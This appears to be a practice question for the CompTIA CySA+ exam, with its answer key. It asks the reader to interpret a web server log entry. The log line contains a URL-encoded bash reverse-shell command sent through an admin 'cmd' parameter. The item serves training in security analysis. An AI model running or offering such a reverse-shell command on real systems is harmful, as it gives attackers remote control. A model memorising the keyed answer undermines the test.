CompTIA CySA+ (CS0-003) — Question 351

A security analyst identifies the following log entry in the web server logs:

10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -

Which of the following best explains the log entry?

Answer options

• A. This was caused by an administrator logging in to a website using the command line.
• B. This is a successful lateral movement abusing an RCE vulnerability.
• C. This is a failed attack attempting to exploit an LFI vulnerability.
• D. This was caused by a successful RFI vulnerability exploitation.

Correct answer: B

Explanation

The log entry shows a command that is attempting to establish a reverse shell connection, which indicates successful lateral movement and exploitation of a Remote Code Execution (RCE) vulnerability. Option A incorrectly suggests legitimate administrative access, while options C and D misinterpret the log entry as failed or different types of vulnerabilities.